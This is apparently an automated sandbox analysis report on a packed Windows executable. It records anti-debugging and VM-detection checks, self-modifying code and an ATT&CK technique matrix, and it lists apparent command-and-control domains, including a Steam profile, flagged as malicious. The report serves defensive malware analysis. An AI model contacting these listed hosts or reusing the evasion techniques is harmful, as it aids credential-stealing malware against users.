    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7FFCEE second address: 7FFD11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF7A105DEB5h 0x00000009 pop edx 0x0000000a popad 0x0000000b pushad 0x0000000c push ecx 0x0000000d push eax 0x0000000e pop eax 0x0000000f pop ecx 0x00000010 push edi 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7FFE85 second address: 7FFE89 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 80AED7 second address: 80AEDD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 80AEDD second address: 80AEFE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jmp 00007FF7A0B38034h 0x0000000c pop edi 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 80AEFE second address: 80AF04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 80AF04 second address: 80AF08 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 80AF08 second address: 80AF11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 80AF11 second address: 80AF24 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FF7A0B38026h 0x0000000a pop edi 0x0000000b jbe 00007FF7A0B3802Eh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 811350 second address: 811366 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF7A105DEB1h 0x00000009 popad 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 815011 second address: 815042 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF7A0B3802Ah 0x00000007 pushad 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a push edi 0x0000000b pop edi 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FF7A0B3802Fh 0x00000016 jmp 00007FF7A0B3802Ch 0x0000001b rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 815042 second address: 815057 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF7A105DEABh 0x00000009 jnp 00007FF7A105DEA6h 0x0000000f rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 815057 second address: 81505D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 821F91 second address: 821FAA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF7A105DEAFh 0x00000007 jne 00007FF7A105DEA6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 83A5D5 second address: 83A5DB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 83A5DB second address: 83A60F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF7A105DEB6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jnc 00007FF7A105DEB6h 0x00000013 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 83A60F second address: 83A614 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 83A777 second address: 83A786 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 jg 00007FF7A105DEA6h 0x0000000f rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 83A786 second address: 83A7C9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF7A0B3802Bh 0x00000007 jo 00007FF7A0B38026h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 pushad 0x00000014 popad 0x00000015 push edx 0x00000016 pop edx 0x00000017 push ecx 0x00000018 pop ecx 0x00000019 jmp 00007FF7A0B3802Eh 0x0000001e popad 0x0000001f push eax 0x00000020 push edx 0x00000021 push edx 0x00000022 pop edx 0x00000023 jmp 00007FF7A0B38031h 0x00000028 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 83A7C9 second address: 83A7D3 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FF7A105DEA6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 83A7D3 second address: 83A7D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 83A97F second address: 83A985 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 83A985 second address: 83A996 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jnc 00007FF7A0B3802Ch 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 83A996 second address: 83A99D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 83AF82 second address: 83AF8C instructions: 0x00000000 rdtsc 0x00000002 ja 00007FF7A0B3802Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 83AF8C second address: 83AF96 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 83CDEB second address: 83CE19 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 jmp 00007FF7A0B38036h 0x0000000d jmp 00007FF7A0B3802Eh 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 83F915 second address: 83F990 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF7A105DEB5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edi 0x0000000a jmp 00007FF7A105DEAEh 0x0000000f pop edi 0x00000010 popad 0x00000011 push eax 0x00000012 jmp 00007FF7A105DEB2h 0x00000017 nop 0x00000018 mov dh, E9h 0x0000001a push 00000004h 0x0000001c movsx edx, dx 0x0000001f call 00007FF7A105DEA9h 0x00000024 pushad 0x00000025 pushad 0x00000026 jns 00007FF7A105DEA6h 0x0000002c jmp 00007FF7A105DEB3h 0x00000031 popad 0x00000032 push eax 0x00000033 push edx 0x00000034 jmp 00007FF7A105DEAFh 0x00000039 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 841379 second address: 84138E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF7A0B3802Bh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84138E second address: 841392 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 841392 second address: 8413AF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF7A0B38039h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8413AF second address: 8413CE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF7A105DEB5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push edx 0x0000000e pop edx 0x0000000f rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8413CE second address: 8413D6 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A80D4D second address: 4A80D5D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF7A105DEACh 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A80D5D second address: 4A80DB7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ecx, dword ptr [eax+00000FDCh] 0x0000000e jmp 00007FF7A0B38037h 0x00000013 test ecx, ecx 0x00000015 pushad 0x00000016 jmp 00007FF7A0B38034h 0x0000001b mov dx, ax 0x0000001e popad 0x0000001f jns 00007FF7A0B3805Bh 0x00000025 jmp 00007FF7A0B3802Ch 0x0000002a add eax, ecx 0x0000002c push eax 0x0000002d push edx 0x0000002e push eax 0x0000002f push edx 0x00000030 pushad 0x00000031 popad 0x00000032 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A80DB7 second address: 4A80DBB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A80DBB second address: 4A80DC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A80DC1 second address: 4A80DD0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF7A105DEABh 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A80DD0 second address: 4A80E07 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [eax+00000860h] 0x0000000e pushad 0x0000000f mov si, di 0x00000012 mov edx, 31FE5A72h 0x00000017 popad 0x00000018 test eax, eax 0x0000001a pushad 0x0000001b mov dx, C5CAh 0x0000001f jmp 00007FF7A0B3802Bh 0x00000024 popad 0x00000025 je 00007FF811CADF8Ah 0x0000002b push eax 0x0000002c push edx 0x0000002d push eax 0x0000002e push edx 0x0000002f push eax 0x00000030 push edx 0x00000031 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A80E07 second address: 4A80E0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A80E0B second address: 4A80E0F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A80E0F second address: 4A80E15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75D129 second address: 75D133 instructions: 0x00000000 rdtsc 0x00000002 je 00007FF7A0B3802Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 5B3F5D instructions caused by: Self-modifying code
    Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 5B3E83 instructions caused by: Self-modifying code
    Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 7D53F2 instructions caused by: Self-modifying code
    Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
    Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
    Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
    Source: C:\Users\user\Desktop\file.exe TID: 6720Thread sleep time: -90000s >= -30000sJump to behavior
    Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
    Source: file.exe, file.exe, 00000000.00000002.1706343418.0000000000731000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
    Source: file.exe, 00000000.00000003.1702917421.0000000000CBA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1694741062.0000000000CBA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1707016572.0000000000CBA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
    Source: file.exe, 00000000.00000003.1702917421.0000000000CA8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1694741062.0000000000CA8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1707016572.0000000000CA8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWL
    Source: file.exe, 00000000.00000002.1706343418.0000000000731000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
    Source: file.exe, 00000000.00000002.1706972761.0000000000C2E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW@
    Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
    Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

    Anti Debugging

    barindex
    Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
    Source: C:\Users\user\Desktop\file.exeOpen window title or class name: regmonclass
    Source: C:\Users\user\Desktop\file.exeOpen window title or class name: gbdyllo
    Source: C:\Users\user\Desktop\file.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
    Source: C:\Users\user\Desktop\file.exeOpen window title or class name: procmon_window_class
    Source: C:\Users\user\Desktop\file.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
    Source: C:\Users\user\Desktop\file.exeOpen window title or class name: ollydbg
    Source: C:\Users\user\Desktop\file.exeOpen window title or class name: filemonclass
    Source: C:\Users\user\Desktop\file.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
    Source: C:\Users\user\Desktop\file.exeFile opened: NTICE
    Source: C:\Users\user\Desktop\file.exeFile opened: SICE
    Source: C:\Users\user\Desktop\file.exeFile opened: SIWVID
    Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
    Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
    Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00595BB0 LdrInitializeThunk,0_2_00595BB0

    HIPS / PFW / Operating System Protection Evasion

    barindex
    Source: file.exeString found in binary or memory: clearancek.site
    Source: file.exeString found in binary or memory: licendfilteo.site
    Source: file.exeString found in binary or memory: spirittunek.stor
    Source: file.exeString found in binary or memory: bathdoomgaz.stor
    Source: file.exeString found in binary or memory: studennotediw.stor
    Source: file.exeString found in binary or memory: dissapoiznw.stor
    Source: file.exeString found in binary or memory: eaglepawnoy.stor
    Source: file.exeString found in binary or memory: mobbipenju.stor
    Source: file.exe, 00000000.00000002.1706464774.0000000000774000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: ZProgram Manager
    Source: file.exeBinary or memory string: ZProgram Manager
    Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

    Stealing of Sensitive Information

    barindex
    Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR

    Remote Access Functionality

    barindex
    Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
    Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
    Windows Management Instrumentation
    1
    DLL Side-Loading
    1
    Process Injection
    24
    Virtualization/Sandbox Evasion
    OS Credential Dumping631
    Security Software Discovery
    Remote Services1
    Archive Collected Data
    11
    Encrypted Channel
    Exfiltration Over Other Network MediumAbuse Accessibility Features
    CredentialsDomainsDefault Accounts2
    Command and Scripting Interpreter
    Boot or Logon Initialization Scripts1
    DLL Side-Loading
    1
    Process Injection
    LSASS Memory24
    Virtualization/Sandbox Evasion
    Remote Desktop ProtocolData from Removable Media3
    Ingress Tool Transfer
    Exfiltration Over BluetoothNetwork Denial of Service
    Email AddressesDNS ServerDomain Accounts1
    PowerShell
    Logon Script (Windows)Logon Script (Windows)11
    Deobfuscate/Decode Files or Information
    Security Account Manager2
    Process Discovery
    SMB/Windows Admin SharesData from Network Shared Drive4
    Non-Application Layer Protocol
    Automated ExfiltrationData Encrypted for Impact
    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook4
    Obfuscated Files or Information
    NTDS223
    System Information Discovery
    Distributed Component Object ModelInput Capture115
    Application Layer Protocol
    Traffic DuplicationData Destruction
    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script12
    Software Packing
    LSA SecretsInternet Connection DiscoverySSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
    DLL Side-Loading
    Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand
    SourceDetectionScannerLabelLink
    file.exe100%AviraTR/Crypt.TPM.Gen
    file.exe100%Joe Sandbox ML
    No Antivirus matches
    No Antivirus matches
    No Antivirus matches
    SourceDetectionScannerLabelLink
    https://player.vimeo.com0%URL Reputationsafe
    https://store.steampowered.com/subscriber_agreement/0%URL Reputationsafe
    https://www.gstatic.cn/recaptcha/0%URL Reputationsafe
    http://www.valvesoftware.com/legal.htm0%URL Reputationsafe
    https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback0%URL Reputationsafe
    https://steam.tv/0%URL Reputationsafe
    https://steamcommunity.com:443/profiles/76561199724331900100%URL Reputationmalware
    https://store.steampowered.com/points/shop/0%URL Reputationsafe
    https://lv.queniujq.cn0%URL Reputationsafe
    https://store.steampowered.com/privacy_agreement/0%URL Reputationsafe
    https://checkout.steampowered.com/0%URL Reputationsafe
    https://store.steampowered.com/;0%URL Reputationsafe
    https://store.steampowered.com/about/0%URL Reputationsafe
    https://help.steampowered.com/en/0%URL Reputationsafe
    https://store.steampowered.com/news/0%URL Reputationsafe
    https://recaptcha.net/recaptcha/;0%URL Reputationsafe
    https://store.steampowered.com/stats/0%URL Reputationsafe
    https://medal.tv0%URL Reputationsafe
    https://broadcast.st.dl.eccdnx.com0%URL Reputationsafe
    https://store.steampowered.com/steam_refunds/0%URL Reputationsafe
    https://login.steampowered.com/0%URL Reputationsafe
    https://recaptcha.net0%URL Reputationsafe
    https://store.steampowered.com/0%URL Reputationsafe
    NameIPActiveMaliciousAntivirus DetectionReputation
    steamcommunity.com
    104.102.49.254
    truetrue
      unknown
      sergei-esenin.com
      104.21.53.8
      truetrue
        unknown
        eaglepawnoy.store
        unknown
        unknowntrue
          unknown
          bathdoomgaz.store
          unknown
          unknowntrue
            unknown
            spirittunek.store
            unknown
            unknowntrue
              unknown
              licendfilteo.site
              unknown
              unknowntrue
                unknown
                studennotediw.store
                unknown
                unknowntrue
                  unknown
                  mobbipenju.store
                  unknown
                  unknowntrue
                    unknown
                    clearancek.site
                    unknown
                    unknowntrue
                      unknown
                      dissapoiznw.store
                      unknown
                      unknowntrue
                        unknown
                        NameMaliciousAntivirus DetectionReputation
                        studennotediw.storetrue
                          unknown
                          dissapoiznw.storetrue
                            unknown
                            https://steamcommunity.com/profiles/76561199724331900true
                              unknown
                              eaglepawnoy.storetrue
                                unknown
                                bathdoomgaz.storetrue
                                  unknown
                                  clearancek.sitetrue
                                    unknown
                                    spirittunek.storetrue
                                      unknown
                                      licendfilteo.sitetrue
                                        unknown
                                        mobbipenju.storetrue
                                          unknown
                                          NameSourceMaliciousAntivirus DetectionReputation
                                          https://www.cloudflare.com/learning/access-management/phishing-attack/file.exe, 00000000.00000002.1707016572.0000000000CE1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1694741062.0000000000CE1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1702917421.0000000000CE1000.00000004.00000020.00020000.00000000.sdmpfalse
                                            unknown
                                            https://player.vimeo.comfile.exe, 00000000.00000003.1694741062.0000000000CBA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1702917421.0000000000CE1000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            unknown
                                            https://store.steampowered.com/;Persistent-AuthWWW-AuthenticateVarysteamCountry=US%7C0e3d185a3e106e7file.exe, 00000000.00000003.1694741062.0000000000CBA000.00000004.00000020.00020000.00000000.sdmpfalse
                                              unknown
                                              https://www.cloudflare.com/learning/accesfile.exe, 00000000.00000003.1694741062.0000000000CBA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                unknown
                                                https://community.steamstatic.com/public/javascript/promo/stickers.js?v=W8NP8aTVqtms&amp;l=englishfile.exe, 00000000.00000002.1707016572.0000000000CE1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1694712578.0000000000D0B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1694741062.0000000000CE1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1702917421.0000000000CE1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  unknown
                                                  https://steamcommunity.com/?subsection=broadcastsfile.exe, 00000000.00000003.1694712578.0000000000D0B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    unknown
                                                    https://mobbipenju.store:443/apibcryptPrimitives.dll%file.exe, 00000000.00000002.1707016572.0000000000C6F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1702917421.0000000000C6F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      unknown
                                                      https://community.steamstatic.com/public/shared/css/motiva_sans.css?v=v7XTmVzbLV33&amp;l=englishfile.exe, 00000000.00000003.1694712578.0000000000D0B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1694741062.0000000000CE1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1702917421.0000000000CE1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        unknown
                                                        https://sergei-esenin.com/file.exe, 00000000.00000003.1694741062.0000000000CBA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1707198878.0000000000D0A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          unknown
                                                          https://community.steamstatic.com/public/css/globalv2.css?v=dQy8Omh4p9PH&amp;l=englishfile.exe, 00000000.00000002.1707016572.0000000000CE1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1694712578.0000000000D0B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1694741062.0000000000CE1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1702917421.0000000000CE1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            unknown
                                                            https://store.steampowered.com/subscriber_agreement/file.exe, 00000000.00000003.1694712578.0000000000D0B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            • URL Reputation: safe
                                                            unknown
                                                            https://www.gstatic.cn/recaptcha/file.exe, 00000000.00000003.1694741062.0000000000CBA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1702917421.0000000000CE1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            • URL Reputation: safe
                                                            unknown
                                                            http://www.valvesoftware.com/legal.htmfile.exe, 00000000.00000003.1694712578.0000000000D0B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            • URL Reputation: safe
                                                            unknown
                                                            https://www.youtube.comfile.exe, 00000000.00000003.1694741062.0000000000CBA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1702917421.0000000000CE1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              unknown
                                                              https://www.google.comfile.exe, 00000000.00000003.1694741062.0000000000CBA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1702917421.0000000000CE1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                unknown
                                                                https://community.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0file.exe, 00000000.00000002.1707016572.0000000000CE1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1694712578.0000000000D0B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1694741062.0000000000CE1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1702917421.0000000000CE1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  unknown
                                                                  https://community.steamstafile.exe, 00000000.00000003.1703595779.0000000000D0A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1707198878.0000000000D0A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    unknown
                                                                    https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedbackfile.exe, 00000000.00000003.1702540658.0000000000D10000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1694712578.0000000000D0B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    unknown
                                                                    https://community.steamstatic.com/public/css/skin_1/modalContent.css?v=.VpiwkLAYt9r1file.exe, 00000000.00000002.1707016572.0000000000CE1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1694712578.0000000000D0B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1694741062.0000000000CE1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1702917421.0000000000CE1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      unknown
                                                                      https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/file.exe, 00000000.00000003.1694741062.0000000000CBA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        unknown
